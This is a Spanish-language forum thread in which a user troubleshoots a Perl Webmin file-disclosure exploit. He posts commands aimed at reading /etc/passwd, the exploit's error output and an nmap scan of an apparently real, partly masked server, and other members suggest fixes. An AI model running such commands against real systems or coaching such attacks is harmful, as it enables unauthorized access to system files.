webmin attack error

Iniciado por jackaroe, 6 Julio 2010, 05:15 AM

0 Miembros y 1 Visitante están viendo este tema.

jackaroe

hola, estoy probando un exploit para webmin que cuando lo ejecuto recibo el siguiente error.

[nube@GNU webmin]$ perl 2017.pl https://server.xxxxxxx.xxxx 10000 /etc/passwd 1
WEBMIN EXPLOIT !!!!! coded by UmZ!
Comments and Suggestions are welcome at umz32.dll [at] gmail.com
Vulnerability disclose at securitydot.net
I am just coding it in perl 'cuz I hate PHP!
Attacking https://server.xxxxxxxxx.xxxx on port 10000!
FILENAME:  /etc/passwd
Failed: 500 Can't connect to https::443 (Bad hostname 'https:')


nmap quick scan plus

Starting Nmap 5.21 ( http://nmap.org ) at 2010-07-06 00:10 ART

Nmap scan report for www.xxxxxxxxxxx.xxx (2**.45.xx.**)
Host is up (0.32s latency).
rDNS record for 2**.45.**:  server.xxxxxxxxxx.xxxx
Not shown: 92 filtered ports
PORT      STATE  SERVICE VERSION
21/tcp    closed ftp
22/tcp    closed ssh
53/tcp    open   domain  ISC BIND 9.5.0-P1
80/tcp    open   http    Apache httpd 2.2.8 ((Fedora))
110/tcp   open   pop3    Dovecot pop3d
143/tcp   open   imap    Dovecot imapd
873/tcp   closed rsync
10000/tcp open   http    MiniServ 0.01 (Webmin httpd)


Device type: general purpose|firewall|proxy server|WAP
Running (JUST GUESSING) : Linux 2.6.X|2.4.X (93%), ISS Linux 2.4.X (92%), Cisco Linux 2.6.X (88%), Riverbed embedded (88%), AVM embedded (87%), Netgear embedded (87%), Linksys embedded (87%)
Aggressive OS guesses: Blue Coat Director (Linux 2.6.10) (93%), Linux 2.6.18 (93%), Linux 2.6.5 (93%), Linux 2.6.9 - 2.6.27 (92%), ISS Proventia GX3002 firewall (Linux 2.4.18) (92%), Linux 2.6.9 (89%), Linux 2.4.20 (88%), Linux 2.6.18 - 2.6.28 (88%), Linux 2.6.24 (88%), Linux 2.6.29 (88%)
No exact OS matches for host (test conditions non-ideal).


Y no sé como demonios avanzar. :huh:
Ya instalé las librerías perl-crypt-ssleay y perl-net-ssleay y no sé que me puede estar faltando.

Desde ya agradezco cualquier ayuda.

Søra

Prueba este y que no se te olvide instalar php5-curl con linux desde los repositorios con:

sudo apt-get install php5-curl

He visto el code por encima y creo que no hay que modificar nada que asi funciona...



Saludos Søra





Se busca sabio para intercambio:
Todo lo que se por la mitad de lo que desconozco.

kamsky

"Failed: 500 Can't connect to https::443 (Bad hostname 'https:')"
----NO HAY ARMA MÁS MORTÍFERA QUE UNA PALABRA BROTADA DE UN CORAZÓN NOBLE, Y UN PAR DE HUEVOS QUE LA RESPALDEN---

                       hack 4 free!!

Søra

kamsky eso quiere decir que tiene que indicar el server sin el http:// ??? es que ahora mismo tengo la duda....



Saludos Søra





Se busca sabio para intercambio:
Todo lo que se por la mitad de lo que desconozco.

kamsky

sep, si os dais cuenta, en la salida de nmap, indica que sólo está abierto el puerto 80 (http), pero no el 443(http+tls/ssl)
----NO HAY ARMA MÁS MORTÍFERA QUE UNA PALABRA BROTADA DE UN CORAZÓN NOBLE, Y UN PAR DE HUEVOS QUE LA RESPALDEN---

                       hack 4 free!!

Debci

Tienes que ponerle la ip del hsot y no el dns.

Saludos

jackaroe

antes que nada gracias a todos.:)

Si ejecuto el exploit en base a la IP recibo un:

[nube@GNU webmin]$ perl 2017.pl 2**.4*.44.** 10000 /etc/passwd 1
WEBMIN EXPLOIT !!!!! coded by UmZ!
Comments and Suggestions are welcome at umz32.dll [at] gmail.com
Vulnerability disclose at securitydot.net
I am just coding it in perl 'cuz I hate PHP!
Attacking 2**.4*.44.** on port 10000!
FILENAME:  /etc/passwd
Failed: 404 File not found


Por otro lado usaba la dirección completa porque es la cual desde donde se loguea el webmin. En mi caso:

https://server1.la****.***.ar:10000/




saludos

kamsky

prueba a ver si admite http, ya que dudo que el exploit soporte https
----NO HAY ARMA MÁS MORTÍFERA QUE UNA PALABRA BROTADA DE UN CORAZÓN NOBLE, Y UN PAR DE HUEVOS QUE LA RESPALDEN---

                       hack 4 free!!

jackaroe


[nube@GNU webmin]$ perl 2017.pl 2**.45.*.* 10000 /etc/passwd 0
WEBMIN EXPLOIT !!!!! coded by UmZ!
Comments and Suggestions are welcome at umz32.dll [at] gmail.com
Vulnerability disclose at securitydot.net
I am just coding it in perl 'cuz I hate PHP!
Attacking 2**.45.4*.** on port 10000!
FILENAME:  /etc/passwd

FILE CONTENT STARTED
-----------------------------------
<h1>Error - Bad Request</h1>
<pre>This web server is running in SSL mode. Try the URL <a href='https://server1.l***.**.**:10000/'>https://server1.***.**.**:10000/</a> instead.<br></pre>

-------------------------------------


:huh: